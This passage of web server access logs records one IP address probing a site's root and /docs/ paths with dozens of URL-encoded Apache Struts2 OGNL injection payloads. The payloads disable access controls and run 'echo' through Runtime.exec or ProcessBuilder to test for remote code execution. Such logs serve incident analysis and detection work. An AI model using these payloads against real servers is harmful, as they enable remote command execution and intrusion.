/?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:25:32 +0100] "GET /?%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43mycmd%5C75%5C%27echo%20ccvaevcc%5C%27%27%29%28d%29%29&%28h%29%28%28%27%5C43myret%5C75@java.lang.Runtime@getRuntime%28%29.exec%28%5C43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27%5C43mydat%5C75new%5C40java.io.DataInputStream%28%5C43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27%5C43myres%5C75new%5C40byte%5B51020%5D%27%29%28d%29%29&%28k%29%28%28%27%5C43mydat.readFully%28%5C43myres%29%27%29%28d%29%29&%28l%29%28%28%27%5C43mystr%5C75new%5C40java.lang.String%28%5C43myres%29%27%29%28d%29%29&%28m%29%28%28%27%5C43myout%5C75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27%5C43myout.getWriter%28%29.println%28%5C43mystr%29%27%29%28d%29%29 HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:25:32 +0100] "POST / HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:25:33 +0100] "GET //devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20ccvaevcc%27%29.getInputStream%28%29%29) HTTP/1.0" 404 737 208.87.206.42 - - [09/Jan/2024:13:25:34 +0100] "GET //devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20ccvaevcc%27%29.getInputStream%28%29%29) HTTP/1.0" 404 737 208.87.206.42 - - [09/Jan/2024:13:25:35 +0100] "GET /&key=(%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D=+new+java.lang.Boolean(false),+%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27echo%20ccvaevcc%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5B51020%5D,%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z%5B(key)(%27meh%27)%5D HTTP/1.0" 404 1231 208.87.206.42 - - [09/Jan/2024:13:25:35 +0100] "GET /&key=(%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D=+new+java.lang.Boolean(false),+%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27echo%20ccvaevcc%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5B51020%5D,%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z%5B(key)(%27meh%27)%5D HTTP/1.0" 404 1231 208.87.206.42 - - [09/Jan/2024:13:25:36 +0100] "GET /%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D HTTP/1.0" 404 1231 208.87.206.42 - - [09/Jan/2024:13:25:36 +0100] "GET /%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D HTTP/1.0" 404 1231 208.87.206.42 - - [09/Jan/2024:13:25:37 +0100] "GET /?x=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:25:38 +0100] "GET /?x=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:25:38 +0100] "GET /%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream())%2C%23q%7D.action HTTP/1.0" 404 1106 208.87.206.42 - - [09/Jan/2024:13:25:39 +0100] "GET /%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream())%2C%23q%7D.action HTTP/1.0" 404 1106 208.87.206.42 - - [09/Jan/2024:13:25:39 +0100] "GET /?redirect%3A%24%7B6335674%2B7922901%7D HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:25:41 +0100] "GET /?redirect%3A%24%7B6335674%2B7922901%7D HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:25:42 +0100] "GET /?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close() HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:25:48 +0100] "GET /?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close() HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:25:49 +0100] "POST / HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:25:50 +0100] "POST / HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:25:51 +0100] "GET /?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context%5B%23parameters.obj%5B0%5D%5D.getWriter().print(%23parameters.content%5B0%5D%2B602%2B53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:25:52 +0100] "GET /?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context%5B%23parameters.obj%5B0%5D%5D.getWriter().print(%23parameters.content%5B0%5D%2B602%2B53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:25:52 +0100] "GET /%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D%2B602%2B53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 404 924 208.87.206.42 - - [09/Jan/2024:13:25:53 +0100] "GET /%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D%2B602%2B53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 404 924 208.87.206.42 - - [09/Jan/2024:13:25:53 +0100] "GET /(%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23rs%3D@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=echo%20ccvaevcc HTTP/1.0" 404 1042 208.87.206.42 - - [09/Jan/2024:13:25:54 +0100] "POST / HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:25:56 +0100] "POST / HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:26:01 +0100] "POST / HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:26:13 +0100] "POST / HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:26:24 +0100] "POST / HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:26:25 +0100] "GET /?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=echo%20ccvaevcc HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:26:26 +0100] "GET /%24%7B7213611%2B5345929%7D/index.action HTTP/1.0" 404 761 208.87.206.42 - - [09/Jan/2024:13:26:26 +0100] "GET / HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:26:27 +0100] "POST /docs/ HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:26:28 +0100] "POST /docs/ HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:26:28 +0100] "GET /docs/?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:26:29 +0100] "GET /docs/?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:26:30 +0100] "GET /docs/?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:26:30 +0100] "GET /docs/?%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43mycmd%5C75%5C%27echo%20ccvaevcc%5C%27%27%29%28d%29%29&%28h%29%28%28%27%5C43myret%5C75@java.lang.Runtime@getRuntime%28%29.exec%28%5C43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27%5C43mydat%5C75new%5C40java.io.DataInputStream%28%5C43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27%5C43myres%5C75new%5C40byte%5B51020%5D%27%29%28d%29%29&%28k%29%28%28%27%5C43mydat.readFully%28%5C43myres%29%27%29%28d%29%29&%28l%29%28%28%27%5C43mystr%5C75new%5C40java.lang.String%28%5C43myres%29%27%29%28d%29%29&%28m%29%28%28%27%5C43myout%5C75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27%5C43myout.getWriter%28%29.println%28%5C43mystr%29%27%29%28d%29%29 HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:26:31 +0100] "POST /docs/ HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:26:33 +0100] "GET /docs//devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20ccvaevcc%27%29.getInputStream%28%29%29) HTTP/1.0" 404 746 208.87.206.42 - - [09/Jan/2024:13:26:35 +0100] "GET /docs//devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20ccvaevcc%27%29.getInputStream%28%29%29) HTTP/1.0" 404 746 208.87.206.42 - - [09/Jan/2024:13:26:35 +0100] "GET /docs/&key=(%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D=+new+java.lang.Boolean(false),+%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27echo%20ccvaevcc%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5B51020%5D,%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z%5B(key)(%27meh%27)%5D HTTP/1.0" 404 1240 208.87.206.42 - - [09/Jan/2024:13:26:37 +0100] "GET /docs/&key=(%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D=+new+java.lang.Boolean(false),+%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27echo%20ccvaevcc%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5B51020%5D,%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z%5B(key)(%27meh%27)%5D HTTP/1.0" 404 1240 208.87.206.42 - - [09/Jan/2024:13:26:37 +0100] "GET /docs/%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D HTTP/1.0" 404 1240 208.87.206.42 - - [09/Jan/2024:13:26:40 +0100] "GET /docs/%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D HTTP/1.0" 404 1240 208.87.206.42 - - [09/Jan/2024:13:26:40 +0100] "GET /docs/?x=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:26:41 +0100] "GET /docs/?x=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:26:42 +0100] "GET /docs/%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream())%2C%23q%7D.action HTTP/1.0" 404 1115 208.87.206.42 - - [09/Jan/2024:13:26:42 +0100] "GET /docs/%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream())%2C%23q%7D.action HTTP/1.0" 404 1115 208.87.206.42 - - [09/Jan/2024:13:26:43 +0100] "GET /docs/?redirect%3A%24%7B4534679%2B3276838%7D HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:26:44 +0100] "GET /docs/?redirect%3A%24%7B4534679%2B3276838%7D HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:26:45 +0100] "GET /docs/?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close() HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:26:46 +0100] "GET /docs/?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close() HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:26:49 +0100] "POST /docs/ HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:26:50 +0100] "POST /docs/ HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:26:51 +0100] "GET /docs/?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context%5B%23parameters.obj%5B0%5D%5D.getWriter().print(%23parameters.content%5B0%5D%2B602%2B53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:26:51 +0100] "GET /docs/?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context%5B%23parameters.obj%5B0%5D%5D.getWriter().print(%23parameters.content%5B0%5D%2B602%2B53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:26:52 +0100] "GET 